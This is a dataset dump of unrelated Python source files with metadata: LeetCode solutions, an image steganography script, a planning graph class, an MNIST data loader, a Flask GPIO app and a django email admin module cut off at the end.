self.leetcode.login()\n data = self.leetcode.hard_retrieve_home()\n self.home_view = self.make_listview(data)\n self.loop = urwid.MainLoop(self.home_view, palette, unhandled_input=self.keystroke)\n self.view_stack.append(self.home_view)\n self.loop.run()\n\n\nif __name__ == '__main__':\n term = Terminal()\n term.run()\n","sub_path":"leetcode/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"377264837","text":"import cv2\nimport numpy as np\nimport random\n\n\ndef BinaryToDecimal(binary):\n string = int(binary, 2)\n return string\n\n\ndef strToBinary(s):\n bin_conv = []\n for char in string:\n ascii_val = ord(char)\n if(ascii_val < 64):\n bin_conv.append('0')\n binary_val = bin(ascii_val)\n bin_conv.append(binary_val[2:])\n\n return (''.join(bin_conv))\n\n\ndef encrypt(image, string, extension):\n to_be_appended = \"11111111111111111111111111111111111111111111111111111111111111111111111111111111100000000000011111111111111111111111111111111110\"\n img = cv2.imread(image, 0)\n _bin = strToBinary(string)\n bin_of_str = str(_bin)\n total_size = 256 + len(bin_of_str)\n bin_to_append = to_be_appended + bin_of_str + to_be_appended\n height, width = img.shape\n size = height * width\n rand_no = random.randrange(0, height - 12, 1)\n row = rand_no\n col = rand_no % width\n for i in range(row, height):\n for j in range(width):\n if(len(bin_to_append) != 0):\n if((bin_to_append[0] == '1' and img[i][j] % 2 == 0) or (bin_to_append[0] == '0' and img[i][j] % 2 == 1)):\n if(img[i][j] == 255):\n img[i][j] -= 1\n else:\n img[i][j] += 1\n\n else:\n if(img[i][j] >= 254):\n img[i][j] -= 2\n\n else:\n img[i][j] += 2\n\n bin_to_append = bin_to_append[1:]\n\n cv2.imwrite('abc.' + extension, img)\n if(len(bin_to_append) == 0):\n return 1\n else:\n return 0\n\n\ndef decrypt(image):\n appended_front_and_back = \"11111111111111111111111111111111111111111111111111111111111111111111111111111111100000000000011111111111111111111111111111111110\"\n img = cv2.imread(image, 0)\n height, width = img.shape\n a = \"\"\n for i in range(height):\n for j in range(width):\n a = a + str(img[i][j] % 2)\n print(a.count(appended_front_and_back))\n start_index = a.find(appended_front_and_back)\n start_index = start_index + 128\n a = a[start_index:]\n end_index = a.find(appended_front_and_back)\n a = a[0:end_index]\n str_data = ''\n for i in range(0, len(a), 7):\n temp_data = a[i:i + 7]\n decimal_data = BinaryToDecimal(temp_data)\n str_data = str_data + chr(decimal_data)\n return(str_data)\n\n\nif __name__ == \"__main__\":\n e_or_d = int(input('''Do you want to encrypt or decrypt?\n press 1 to ENCRYPT\n press 2 to DECRYPT\n\n :'''))\n if e_or_d == 1:\n image = input(\"Please enter the image you want to encrypt your message in.. : \")\n extension = image.split('.')\n string = input(\"please enter the message you want to encrypt : \")\n a = encrypt(image, string, extension[1])\n if(a):\n print(\"Sucessfully encrypted!!\")\n else:\n print(\"some error\")\n\n elif e_or_d == 2:\n image = input(\"Please enter the image you want to decrypt your message from.. : \")\n a = decrypt(image)\n print(\"Your message has been decrypted Sucessfully\")\n print(\"Your message is: \" + a)\n else:\n print(\"Please restart and type in either 1 to encrypt or 2 to decrypt\")\n","sub_path":"steg.py","file_name":"steg.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"406430374","text":"\"\"\"\nMain class for storing MAPL plans. Such plans\n- are partially ordered\n- may contain speech acts and other higher-level actions\n- store causal links and threat-prevention links between actions\n\n\n\"\"\"\n\nfrom string import Template\nfrom collections import defaultdict\nimport copy\n\nimport networkx\nimport graph\nimport constants\nimport pddl\nfrom utils import Enum\n\nActionStatusEnum = Enum(\"EXECUTABLE\", \"IN_PROGRESS\", \"EXECUTED\", \"FAILED\") \n\nclass OrderingConstraint(object):\n \"\"\"\n An OrderingConstraint is a link between two PlanNodes in a MAPLPlan.\n This is the super class for\n - CausalLink\n - ThreatPreventionLink\n and can be used, e.g., for links in the transitive closure of plans using\n any of the above specialised links.\n \"\"\"\n def __init__(self, fnode, tnode, label=None):\n assert isinstance(fnode, PlanNode)\n assert isinstance(tnode, PlanNode)\n self.fnode = fnode\n self.tnode = tnode\n self.label = label\n def __str__(self):\n if self.label is not None:\n return self.label\n return \"%s -> %s\" % (self.fnode, self.tnode)\n\n\nclass PlanNode(object):\n def __init__(self, action, args, time, status):\n self.action = action\n self.full_args = args\n self.time = time\n self.status = status\n\n self.preconds = set()\n self.replanconds = set()\n self.effects = set()\n self.preconds_universal = set()\n self.replan_universal = set()\n \n self.original_preconds = set()\n self.original_replan = set()\n self.explanations = {}\n \n if not isinstance(action, DummyAction):\n num = len(action.agents) + len(action.maplargs)\n self.args = args[:num]\n else:\n self.args = args\n\n def is_executable(self):\n return self.status == ActionStatusEnum.EXECUTABLE\n\n def is_inprogress(self):\n return self.status == ActionStatusEnum.IN_PROGRESS\n\n def __str__(self):\n #return \"%s(%s)\" % (self.action, self.time)\n def tostr(arg):\n return a.name if hasattr(a,\"name\") else str(a)\n args = [tostr(a) for a in self.args]\n return \"%d: \" % self.time + \" \".join([self.action.name]+args)\n\n def __eq__(self, other):\n return self.__class__ == other.__class__ and self.time == other.time and self.action.name == other.action.name and all(map(lambda a,b: a == b, self.full_args, other.full_args))\n \n def copy(self):\n return self.__class__(self.action, list(self.full_args), self.time, self.status)\n\nclass DummyAction(object):\n def __init__(self, name):\n self.name = name\n def __str__(self):\n return str(self.name)\n\nclass GoalAction(DummyAction):\n def __init__(self, goal):\n self.name = \"goal\"\n self.replan = None\n self.precondition = goal\n def instantiate(self, x):\n pass\n def uninstantiate(self):\n pass\n def __str__(self):\n return str(self.name)\n\nclass DummyNode(PlanNode):\n def __init__(self, name, args, time, status):\n action = DummyAction(name)\n PlanNode.__init__(self, action, args, time, status)\n def __str__(self):\n return str(self.action)\n def __eq__(self, other):\n return self.__class__ == other.__class__ and self.action == other.action\n\nclass MAPLPlan(networkx.MultiDiGraph):\n def __init__(self, init_state=None, goal_condition=None):\n networkx.MultiDiGraph.__init__(self)\n\n self.init_node = self.create_init_node(init_state)\n self.goal_node = self.create_goal_node(goal_condition)\n self.add_node(self.init_node)\n self.add_node(self.goal_node)\n self.execution_position = 0\n\n def create_init_node(self, astate):\n ## TODO: astate is still unused\n return DummyNode(\"init\", [], 0, ActionStatusEnum.EXECUTED)\n def create_goal_node(self, astate):\n ## TODO: astate is still unused\n return DummyNode(\"goal\", [], 9999, ActionStatusEnum.EXECUTABLE)\n\n def add_link(self, n1, n2, svar, val, conflict=False):\n if conflict:\n type = \"prevent_threat\"\n else:\n type = \"depends\"\n self.add_edge(n1, n2, svar=svar, val=val, type=type)\n \n def topological_sort(self):\n return networkx.topological_sort(self)\n\n def executable(self):\n result = set()\n for n in self.nodes_iter():\n if n.status != ActionStatusEnum.EXECUTABLE:\n continue\n if all(pred.status == ActionStatusEnum.EXECUTED for pred in self.predecessors(n)):\n result.add(n)\n \n return result\n \n def compute_depths(self):\n visited = set()\n def visit(n):\n if n not in visited:\n visited.add(n)\n predecessors = self.predecessors(n)\n for pred in predecessors:\n visit(pred)\n \n if predecessors:\n self.node[n]['depth'] = max(self.node[pred]['depth'] for pred in predecessors) + 1\n else:\n self.node[n]['depth'] = 0\n for n in self.nodes_iter():\n visit(n)\n\n def predecessors_iter(self, node, link_type=None):\n if link_type and not isinstance(link_type, (list, tuple)):\n link_type = [link_type]\n for p in networkx.MultiDiGraph.predecessors_iter(self, node):\n if not link_type or any(e['type'] in link_type for e in self[p][node].itervalues()):\n yield p\n \n def predecessors(self, node, link_type=None):\n if not link_type:\n return networkx.MultiDiGraph.predecessors(self, node)\n return [p for p in self.predecessors_iter(node, link_type)]\n\n def successors_iter(self, node, link_type=None):\n if link_type and not isinstance(link_type, (list, tuple)):\n link_type = [link_type]\n for s in networkx.MultiDiGraph.successors_iter(self, node):\n if not link_type or any(e['type'] in link_type for e in self[node][s].itervalues()):\n yield s\n \n def successors(self, node, link_type=None):\n if not link_type:\n return networkx.MultiDiGraph.successors(self, node)\n return [n for n in self.successors_iter(node, link_type)]\n \n def pred_closure(self, node, link_type=None):\n open = set([node])\n closed = set([self.init_node])\n result = set()\n while open:\n node = open.pop()\n closed.add(node)\n pred = set(self.predecessors(node, link_type))\n result |= pred\n open |= (pred - closed)\n return result\n\n def succ_closure(self, node, link_type=None):\n open = set([node])\n closed = set()\n result = set()\n while open:\n node = open.pop()\n closed.add(node)\n succ = set(self.successors(node, link_type))\n result |= succ\n open |= (succ - closed)\n return result\n\n def to_dot(self, name=\"plan\", ranks=[]):\n from pygraphviz import AGraph\n def declare_rank(same_rank_list):\n same_rank_list = ['\"%s\"' % r for r in same_rank_list]\n return '{rank=same; %s}' % \" \".join(same_rank_list)\n\n self.compute_depths()\n ranks = defaultdict(list)\n G = AGraph(directed=True, strict=False)\n for n, data in self.nodes_iter(data=True):\n if n == self.init_node:\n continue\n ranks[data['depth']].append(n)\n attrs = {}\n attrs[\"style\"] = \"filled\"\n if n.status == ActionStatusEnum.EXECUTED:\n attrs[\"fillcolor\"] = \"grey\"\n else:\n attrs[\"fillcolor\"] = \"white\"\n \n if n.action.replan:\n attrs[\"shape\"] = \"box\"\n attrs[\"style\"] += \", rounded, dashed\"\n elif isinstance(n.action, pddl.mapl.MAPLAction) and n.action.sensors:\n attrs[\"shape\"] = \"box\"\n attrs[\"style\"] += \", rounded\"\n \n G.add_node(n, **attrs)\n\n for n1,n2, data in self.edges_iter(data=True):\n if n1 == self.init_node:\n continue\n attrs = {}\n if data['type'] == 'prevent_threat':\n attrs[\"style\"] = \"dashed\"\n attrs[\"color\"] = \"darkgreen\"\n attrs[\"label\"] = str(data['svar'])\n else:\n attrs[\"label\"] = \"%s = %s\" % (str(data['svar']), data['val'].name)\n \n G.add_edge(n1, n2, **attrs)\n\n for rank, nodes in ranks.iteritems():\n G.add_subgraph(nodes, rank='same', label=\"rank %d\" % rank)\n\n return G\n","sub_path":"schools/css-2010/team-violet/subarchitectures/planner.sa/src/python/standalone/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":8800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"368136610","text":"#!/Users/lyjsmac/opt/anaconda3/bin/python3.8\n# -*- encoding: utf-8 -*-\n'''\n@File : x的平方根.py\n@Time : 2020/12/28 4:46 下午\n@Author : little_carp\n@Contact : woshiliyujian@gmail.com\n@Desc : None\n'''\n\n# here put the import lib\n'''\n实现int sqrt(int x)函数。\n\n计算并返回x的平方根,其中x 是非负整数。\n\n由于返回类型是整数,结果只保留整数的部分,小数部分将被舍去。\n\n示例 1:\n\n输入: 4\n输出: 2\n示例 2:\n\n输入: 8\n输出: 2\n说明: 8 的平方根是 2.82842..., \n 由于返回类型是整数,小数部分将被舍去。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/sqrtx\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\nclass Solution:\n def mySqrt(self, x: int) -> int:\n # 方法一:二分查找法\n left,right = 0,x\n while left <=right :\n mid = left + (right - left) //2\n # 让中间数来进行平方,与原数进行比较\n mid_square = mid**2\n if mid_square ==x:\n return mid\n elif mid_square > x:\n right = mid-1\n else:\n left = mid+1\n return min(left,right)\n\n\n # 方法二:牛顿迭代法","sub_path":"Week_04/x的平方根.py","file_name":"x的平方根.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"20453039","text":"import copy\nimport os\nimport zipfile\n\nfrom dagster import check\n\n\ndef subset_environment_dict(environment_dict, solid_name):\n '''Drops solid config for solids other than solid_name; this subsetting is required when\n executing a single solid on EMR to pass config validation.\n '''\n check.dict_param(environment_dict, 'environment_dict')\n check.str_param(solid_name, 'solid_name')\n\n subset = copy.deepcopy(environment_dict)\n if 'solids' in subset:\n solid_config_keys = list(subset['solids'].keys())\n for key in solid_config_keys:\n if key != solid_name:\n del subset['solids'][key]\n return subset\n\n\ndef build_pyspark_zip(zip_file, path):\n '''Archives the current path into a file named `zip_file`\n '''\n check.str_param(zip_file, 'zip_file')\n check.str_param(path, 'path')\n\n with zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) as zf:\n for root, _, files in os.walk(path):\n for fname in files:\n abs_fname = os.path.join(root, fname)\n\n # Skip various artifacts\n if 'pytest' in abs_fname or '__pycache__' in abs_fname or 'pyc' in abs_fname:\n continue\n\n zf.write(abs_fname, os.path.relpath(os.path.join(root, fname), path))\n","sub_path":"python_modules/libraries/dagster-aws/dagster_aws/emr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"469290245","text":"from flask import Flask\nfrom RPi import GPIO\napp = Flask(__name__)\n\nGPIO.setmode(GPIO.BCM)\n\nhuman_input = 23\ncar_input = 24\n\nGPIO.setup(human_input, GPIO.OUT)\nGPIO.output(human_input, False)\nGPIO.setup(car_input, GPIO.OUT)\nGPIO.output(car_input, False)\n\n@app.route(\"/on_human\")\ndef on_human():\n global human_input\n GPIO.output(human_input, True)\n return \"On!\"\n\n@app.route(\"/off_human\")\ndef off_human():\n global human_input\n GPIO.output(human_input, False)\n\n return \"Off!\"\n\n@app.route(\"/on_car\")\ndef on_car():\n global car_input\n GPIO.output(car_input, True)\n\n return \"On!\"\n\n@app.route(\"/off_car\")\ndef off_car():\n global car_input\n GPIO.output(car_input, False)\n\n return \"Off!\"\n\nif __name__ == \"__main__\":\n app.run(port=8080)\n GPIO.cleanup()\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"644038583","text":"#[톱니바퀴]\nimport sys\nfrom collections import deque\n\ndef check_left(start, dirs):\n if start < 1 or tob[start][2] == tob[start+1][6]:\n return\n \n # 왼쪽 확인\n if tob[start+1][6] != tob[start][2]:\n check_left(start - 1, -dirs)\n tob[start].rotate(dirs)\n\ndef check_right(start, dirs):\n if start > 4 or tob[start-1][2] == tob[start][6]:\n return\n\n # 오른쪽 확인\n if tob[start-1][2] != tob[start][6]:\n # 인접한 톱니바퀴가 회전 ���능한지부터 먼저 파악한다.\n check_right(start + 1, -dirs)\n tob[start].rotate(dirs)\n\n \n \n# 기준 톱니바퀴가 있을 때, 왼쪽과 맞닿는 지점은 idx 2, 오른쪽은 6이다.\ntob = {}\nfor i in range(1, 5):\n tob[i] = deque(list(map(int, list(sys.stdin.readline().replace(\"\\n\",\"\")))))\nn = int(sys.stdin.readline())\n\nfor _ in range(n):\n num, dirs = map(int, sys.stdin.readline().split())\n check_left(num-1, -dirs)\n check_right(num+1, -dirs)\n # 기준 톱니바퀴를 회전시킨다.\n tob[num].rotate(dirs)\n \nans=0\nfor i in range(4):\n ans += (2**i) * tob[i+1][0]\nprint(ans)\n","sub_path":"baekjoon/samsungtest/14891.py","file_name":"14891.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34957484","text":"# usr/bin/python3\n# coding:utf-8\n\n\"\"\"\n文件简介: 当前脚本的URL去重工具\n功能简介: 通过MD5加密为每个URL生成一个数据指纹并保存到REDIS数据库中,通过检查指纹实现多线程和分布式下的URL请求去重。\n 通过Requests模块下载网页源代码,并通过LXML模块将下载下来的二进制文件直接转换为XML对象,方便通过XPAHT提取数据。\n 通过Redis模块连接REDIS数据库,保存访问过的URL指纹信息。\n\"\"\"\n\nfrom hashlib import md5\nfrom respDownloader.redisStore import redis_terminal\n\ntry:\n from respDownloader.config import URL_FP_KEY\nexcept ImportError as e:\n URL_FP_KEY = \"url_finger_print\"\n\n\ndef _finger_maker(target_string):\n \"\"\"\n 获取标志字符串,根据字符串生成相应的指纹字符串\n :param target_string: 字符串\n :return: 字符串的指纹(也是字符串)\n \"\"\"\n # 通过目标字符串的二进制数据获取一个指纹对象,这里可以选择MD5,也可以选择其他加密方式。选择MD5是因为他生成的加密字节串长度较短\n fp = md5(target_string.encode())\n # 通过指纹对象fp获取目标字符串的MD5加密字节串, 并作为函数的返回值\n md5_finger = fp.hexdigest()\n return md5_finger\n\n\ndef _sort_url(target_url):\n \"\"\"\n 为可能存在GET参数的URL进行参数排序\n :param target_url: 目标URL\n :return: 排序后的目标URL\n \"\"\"\n # 如果URL中没有GET请求参数,则直接返回URL\n if \"?\" not in target_url:\n return target_url\n\n # 如果URL中存在GET请求参数,则对参数进行排序后重组URL\n url_str = target_url.split('?')[0]\n get_query_str = target_url.split('?')[1]\n\n # 如果存在多个GET参数,则讲GET参数进行分割后按序重新组合,再与URL路径重组\n if \"&\" in get_query_str:\n query_list = get_query_str.split('&')\n query_list.sort()\n get_query_str = \"&\".join(query_list)\n\n # 重组URL,并作为函数的返回值\n new_url = url_str + '?' + get_query_str\n return new_url\n\n\ndef check_url_finger(target_url):\n \"\"\"\n 为将要访问的URL进行可能存在参数排序后创建数据指纹\n :param target_url: 将要访问的URL\n :return: 返回一个数据指纹\n \"\"\"\n # 首先对URL中的可能存在的GET请求参数进行排序,因为GET请求参数是无序的。\n # 要保证不能因为可能存在的GET请求参数的顺序不同而重复访问下载一个页面。\n url_sorted = _sort_url(target_url=target_url)\n # 获取排序后的URL的MD5加密指纹字节串\n url_finger = _finger_maker(url_sorted)\n # 尝试将指纹添加到redis数据库的set集合中,如果无法插入则表示指纹已经存在\n result = redis_terminal.sadd(URL_FP_KEY, url_finger)\n return True if result == 1 else False\n\n\n\n\nif __name__ == '__main__':\n # finger_str = _finger_maker(target_string='nihaonishibushia')\n # print(finger_str)\n pass\n","sub_path":"respDownloader/URLexaminer.py","file_name":"URLexaminer.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402427780","text":"from keras.datasets import mnist\r\nimport tensorflow as tf\r\n\r\ndef read_and_preprocess_mnist(features, labels):\r\n num_classes = 10\r\n\r\n features = tf.cast(tf.reshape(features, [28,28]), tf.float32) / 255\r\n features = tf.expand_dims(features, axis=-1)\r\n labels = tf.cast(tf.one_hot(labels,num_classes), tf.int32)\r\n return features, labels\r\n\r\n# set the batch dimension to a constant size. This makes TPUs happy.\r\ndef _set_shapes(batch_size, features, labels, transpose_input = False, extra_dims = 0):\r\n \"\"\"Statically set the batch_size dimension.\"\"\"\r\n \"\"\"needed to make batch_size read as a fixed value to make TPUs happy\"\"\"\r\n \r\n def _set_shape_transpose(x, batch_size = batch_size):\r\n x.set_shape(x.get_shape().merge_with(tf.TensorShape([None] * extra_dims + [batch_size])))\r\n \r\n def _set_shape(x, extra_dims = 0, batch_size = batch_size):\r\n x.set_shape(x.get_shape().merge_with(tf.TensorShape([batch_size] + [None] * extra_dims)))\r\n\r\n if transpose_input:\r\n _set_shape_transpose(features, 3)\r\n _set_shape_transpose(labels)\r\n else:\r\n _set_shape(features, 3)\r\n _set_shape(labels)\r\n return features, labels\r\n\r\ndef get_mnist_datset(flags, is_training = True):\r\n batch_size = flags.batch_size\r\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\n if is_training:\r\n dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))\r\n dataset = dataset.repeat()\r\n dataset = dataset.shuffle(128)\r\n else:\r\n dataset = tf.data.Dataset.from_tensor_slices((x_test, y_test))\r\n # augment and batch\r\n dataset = dataset.map(read_and_preprocess_mnist)\r\n\r\n # note the batch diminsion is assumed in this syntax\r\n dataset = dataset.padded_batch(batch_size=batch_size, \r\n padded_shapes = ([28,28,1],[10]),\r\n drop_remainder=True)\r\n\r\n # assign static shape. Needed only for TPU training.\r\n # dataset = dataset.map(\r\n # functools.partial(_set_shapes, batch_size)\r\n # )\r\n\r\n # prefetch data while training\r\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\r\n \r\n return dataset","sub_path":"mnist_testing/mnist_data_loader.py","file_name":"mnist_data_loader.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"227215913","text":"import sys\nimport os\n\nfrom role2md.tasks.tasks_parser import parse_tasks\nfrom role2md.defaults.defaults_parser import parse_defaults\nfrom role2md.table2md import table_to_md\nfrom role2md.templates.templates_parser import parse_templates\n\n\ndef main(argv):\n root_dir = argv[0]\n table = {}\n\n if not os.path.exists(root_dir):\n raise Exception(\"{} does not exists.\".format(root_dir))\n\n # Parse all the default files in the role\n if os.path.exists(root_dir + \"/defaults\"):\n for subdir, dirs, files in os.walk(root_dir + \"/defaults\"):\n for file in files:\n parse_defaults((os.path.join(subdir, file)), table)\n print(\"Defualt: {}\".format(os.path.join(subdir, file)))\n\n # Parse main.yml task recursively, if main.yml exists\n if os.path.exists(root_dir + \"/tasks\"):\n scanned_files, registered_vars = parse_tasks((os.path.join(root_dir, \"tasks/main.yml\")), table, True)\n print(\"Files scanned:\\n\\t\\t\" + '\\n\\t\\t'.join(scanned_files))\n else:\n raise Exception(\"{}/task/main.yml does not exists.\".format(root_dir))\n\n # Parse all the template files in the role\n if os.path.exists(root_dir + \"/templates\"):\n for subdir, dirs, files in os.walk(root_dir + \"/templates\"):\n for file in files:\n parse_templates((os.path.join(subdir, file)), table, registered_vars)\n print(\"Template: {}\".format(os.path.join(subdir, file)))\n else:\n print(\"Skipping templates - Templates not found.\")\n\n # Generate the markdown table from the collected variables\n md_table = table_to_md(table)\n print(md_table)\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))\n","sub_path":"role2md.py","file_name":"role2md.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"167606828","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n \n def printLList(self): \n current = self\n lst = []\n while (current):\n lst.append(current.val) \n current = current.next\n print(lst)\n\ndef makeLLFromList(items):\n \"\"\"Given a list of items, return the head of the linked list.\"\"\"\n head = None\n if items: \n previous = ListNode(items[0])\n head = previous\n \n for i in range(1, len(items)): \n new_node = ListNode(items[i])\n previous.next = new_node\n previous = new_node\n return head\n\ndef swapPairs(A):\n \"\"\"\n Given a linked list head, swap every two adjacent nodes and return the new head.\n\n @param A : head node of linked list\n @return the head node in the linked list\n\n \"\"\"\n\n a = A\n b = A.next\n head = b if A and A.next else A\n\n previous = None\n\n while a and b: \n a.next = b.next\n b.next = a\n if previous: \n previous.next = b\n previous = a\n a = a.next\n if a: \n b = a.next\n else: \n b = None\n\n return head\n \nlst = [28, 34, 48, 74, 42, 49, 37, 59, 97, 96, 73, 44, 39, 50, 80]\nhead = makeLLFromList(lst) \nswapped = swapPairs(head)\nswapped.printLList() #[34, 28, 74, 48, 49, 42, 59, 37, 96, 97, 44, 73, 50, 39, 80]","sub_path":"week_1/ib_swap_list_nodes_pairs.py","file_name":"ib_swap_list_nodes_pairs.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"754203","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport logging\nimport warnings\n\n\nfrom django import forms\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError, ImproperlyConfigured\nfrom django.forms import BaseInlineFormSet, widgets\nfrom django.forms.widgets import TextInput\nfrom django.template.defaultfilters import safe\nfrom django.utils import six\nfrom django.utils.html import strip_spaces_between_tags, escape\nfrom django.utils.safestring import mark_safe\nfrom django.utils.text import Truncator\nfrom django.utils.translation import ugettext, ugettext_lazy as _, ungettext\n\nfrom . import settings as postoffice_settings\nfrom .fields import CommaSeparatedEmailField\nfrom .models import Attachment, Log, Email, EmailTemplate, STATUS, AttachmentTemplate\nfrom .utils import render_to_template_email\n\nlogger = logging.getLogger(__name__)\n\nclass LogInline(admin.StackedInline):\n model = Log\n extra = 0\n\nclass AttachmentInline(admin.TabularInline):\n model=Attachment.emails.through\n readonly_fields = ('display_attachment',)\n fields = ('display_attachment',)\n extra=0\n\n def display_attachment(self,obj):\n if obj and obj.file:\n return '{obj.name}'.format(obj=obj)\n return '---'\n display_attachment.allow_tags= True\n\n\nclass AttachmentTemplateInline(admin.TabularInline):\n model=AttachmentTemplate.email_templates.through\n fields = ('attachmenttemplate',)\n extra=0\n verbose_name = _(\"Email Attachment\")\n verbose_name_plural = _(\"Email Attachments\")\n\n def display_attachment(self,obj):\n if obj and obj.file:\n return '{obj.name}'.format(obj=obj)\n return '---'\n display_attachment.allow_tags= True\n\n\n\nclass CommaSeparatedEmailWidget(TextInput):\n\n def __init__(self, *args, **kwargs):\n super(CommaSeparatedEmailWidget, self).__init__(*args, **kwargs)\n self.attrs.update({'class': 'vTextField'})\n\n def _format_value(self, value):\n # If the value is a string wrap it in a list so it does not get sliced.\n if not value:\n return ''\n if isinstance(value, six.string_types):\n value = [value, ]\n return ','.join([item for item in value])\n\n\n\nclass EmailAdmin(admin.ModelAdmin):\n list_display = ('id', 'to_display', 'subject', 'template',\n 'status', 'last_updated')\n list_filter = ['status', 'template']\n search_fields = ('to', 'subject')\n readonly_fields = (\"display_mail_preview\",)\n\n actions = ['requeue', 'set_as_sent']\n inlines = [LogInline, AttachmentInline]\n\n formfield_overrides = {\n CommaSeparatedEmailField: {'widget': CommaSeparatedEmailWidget}\n }\n\n fieldsets = (\n (None, {'fields': (\n ('subject', 'from_email',),\n ('to', \"cc\", \"bcc\",),\n ('html_message',),\n ('display_mail_preview',),\n ('status', 'priority',),\n )}),\n )\n\n def get_queryset(self, request):\n return super(EmailAdmin, self).get_queryset(request).select_related('template')\n\n def to_display(self, instance):\n return ', '.join(instance.to)\n to_display.short_description = 'to'\n to_display.admin_order_field = 'to'\n\n\n def display_mail_preview(self, obj):\n content = safe(obj.html_message)\n return strip_spaces_between_tags(mark_safe(\"
\\\n \".format(**{'mail_message': escape(strip_spaces_between_tags(content))})))\n display_mail_preview.allow_tags = True\n display_mail_preview.short_description = ugettext(\"Preview\")\n\n def requeue(self, request, queryset):\n \"\"\"An admin action to requeue emails.\"\"\"\n rows_updated = queryset.update(status=STATUS.queued)\n self.message_user(request, ungettext('%(count)d mail was requeued',\n '%(count)d mails were requeued',\n rows_updated) % {'count': rows_updated})\n requeue.short_description = _('Requeue selected emails')\n\n def set_as_sent(self, request, queryset):\n \"\"\"An admin action to requeue emails.\"\"\"\n rows_updated = queryset.update(status=STATUS.sent)\n self.message_user(request, ungettext('%(count)d mail was set as sent',\n '%(count)d mails were set as sent',\n rows_updated) % {'count': rows_updated})\n set_as_sent.short_description = _('Set as sent selected emails')\n\n\nclass LogAdmin(admin.ModelAdmin):\n list_display = ('date', 'email', 'status', 'get_message_preview')\n\n def get_message_preview(self, instance):\n return (u'{0}...'.format(instance.message[:25]) if len(instance.message) > 25\n else instance.message)\n get_message_preview.short_description = 'Message'\n\n\nclass SubjectField(TextInput):\n def __init__(self, *args, **kwargs):\n super(SubjectField, self).__init__(*args, **kwargs)\n self.attrs.update({'style': 'width: 610px;'})\n\n\nclass EmailTemplateAdminForm(forms.ModelForm):\n\n language = forms.ChoiceField(choices=settings.LANGUAGES, required=False,\n widget=widgets.HiddenInput,\n help_text=_(\"Render template in alternative language\"),\n label=_(\"Language\"),)\n\n class Meta:\n model = EmailTemplate\n exclude=()\n\n\nclass EmailTemplateInlineFormset(BaseInlineFormSet):\n\n def __init__(self, *args, **kwargs):\n if settings.USE_I18N:\n initial = kwargs.get('initial',[])\n languages = dict(settings.LANGUAGES).keys()\n instance = kwargs.get('instance', None)\n if not instance:\n # If there isn't the instance, I add all project languages\n for ix,language in enumerate(languages):\n if language != settings.LANGUAGE_CODE:\n try:\n initial[ix].update({'language':language})\n except IndexError:\n initial.append({'language': language})\n else:\n # if there is the instance, I add only languages that miss in the translated_templated\n for ix,language in enumerate(languages):\n # boolean variable that is used to find languages to add in 'initial'\n lang_finded = False\n # iteration on translated_templates\n for translated_template in instance.translated_templates.all():\n if translated_template.language == language:\n # translated_template finded --> language not to be included in initial\n lang_finded = True\n break\n # I add language only if it isn't in translated_templates\n if not lang_finded:\n if language != settings.LANGUAGE_CODE:\n try:\n initial[ix].update({'language':language})\n except IndexError:\n initial.append({'language': language})\n kwargs.update({'initial':initial})\n return super(EmailTemplateInlineFormset,self).__init__(*args, **kwargs)\n\nclass EmailTemplateAdminMixin(object):\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"\n Hook for specifying custom readonly fields.\n \"\"\"\n _readonly_fields = super(EmailTemplateAdminMixin,self).get_readonly_fields(request, obj=obj)\n return list(_readonly_fields) + ['display_html_mail_preview',\n 'display_plain_mail_preview',]\n\n def formfield_for_dbfield(self, db_field, request, **kwargs):\n if db_field.name == 'subject':\n kwargs.update({'widget': SubjectField,\n 'required': True})\n elif db_field.name == 'content_data':\n kwargs.update({'required': True,})\n _editor_found=False\n for _editor in postoffice_settings.get_wysiwyg_editors():\n try:\n _module_name = _editor[0]\n _widget = _editor[1]\n _widget_attrs = _editor[2]\n WysiwygEditor = getattr(__import__(_module_name, {}, {}, [_widget]), _widget)\n kwargs.update({\n 'widget': WysiwygEditor(**_widget_attrs)\n })\n editor_found = True\n break\n except ImportError:\n logger.exception(\"Error Importing WYSIWYG Editor\")\n except IndexError:\n raise ImproperlyConfigured(\"POST_OFFICE.WYSIWYG_EDITORS setting entries are not in form of (,) \")\n if not _editor_found:\n 